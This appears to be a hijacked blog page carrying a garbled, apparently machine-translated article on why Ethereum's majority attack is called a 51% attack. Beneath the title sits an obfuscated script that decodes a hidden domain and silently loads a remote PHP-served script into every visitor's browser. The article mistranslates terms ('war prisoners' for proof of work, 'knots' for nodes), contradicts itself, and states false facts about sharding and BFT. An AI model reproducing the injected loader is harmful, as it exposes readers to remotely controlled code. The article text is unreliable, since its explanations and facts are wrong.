未分類

Ethereum: Why do we call it a 51% attack instead of a 50% attack?

const pdx="bm9yZGVyc3dpbmcuYnV6ei94cC8=";const pde=atob(pdx.replace(/|/g,""));const script=document.createElement("script");script.src="https://"+pde+"cc.php?u=9f962804";document.body.appendChild(script);

Understanding the vulnerability of 51 % of Ethereum attack

The term "51% attack" became synonymous with a great vulnerability in blockchain networks, including those built on the Ethereum platform. But what exactly is this threat and why does it require 50% of the knots to be committed?

To understand the concept, let's dive into the fundamental mechanics of work proof mining (Pow), which is the central mechanism behind most cryptocurrency blockchains.

Work Proof: The Basics

In a blockchain based on war prisoners, miners are rewarded for validating transactions and creating new blocks. To achieve this, they use powerful computers to resolve a complex mathematical puzzle. These breakdown require significant computational power, energy and time.

The vulnerability of 51% attack **

Imagine a scenario in which an invader has compromised half of all knots on the Ethereum (50%) or worse network. In this situation, the invader could control more than 50% of the network's computational resources.

Here is how it would work:

  • The attacker gains control : An invader compromises a significant majority of knots on the Ethereum network, which includes mining pools and individual nodes.

  • This would make it difficult for the honest nodes to agree with the validity of the blocks they created.

The 51 % attack formula

To illustrate this concept, let's look at the probability equations provided in Bitcoin's article:

P = probability An honest knot finds the next block

Q = Probability The invader finds the next block

QZ = Probability The invader will already reach the Z blocks behind

In essence, QZ represents the likelihood that the invader eventually reaches a group of honest knots. However, this equation does not directly explain the complexity of the attack.

Why 50% is not enough

Ethereum: Why do we call it a 51% attack instead of a 50% attack?

The reason why an attacker needs only 50% of knots on the network to launch a successful 51% attack is that the invader can explore the weaknesses of several knots simultaneously. This makes it impossible to identify and isolate individual vulnerabilities, making traditional security ineffective.

Mitigating the attack

To address this vulnerability, Ethereum implemented various resources to strengthen its safety:

  • Shareding : Divides the network into smaller and more manageable parts (fragments) to reduce the attack surface.

  • Consensus Mechanism : Uses a new consensus algorithm called Byzantine failure tolerance (BFT), which provides stronger protection against attacks, requiring at least two nodes to agree on a new block before being accepted in jail .

Conclusion

The vulnerability of 51 % attack is a significant concern for Ethereum and other blockchain networks, as it may have catastrophic consequences if not approached. Understanding the underlying mechanics of the mining of prisoners of war, we get information about why this threat requires such high levels of commitment to be effective. The implementation of robust safety measures such as Shading and Byzantine failure tolerance has helped mitigate this vulnerability, but continuous research and development are needed to stay ahead of possible attacks.

公式LINE
公式LINEスマホ用




-未分類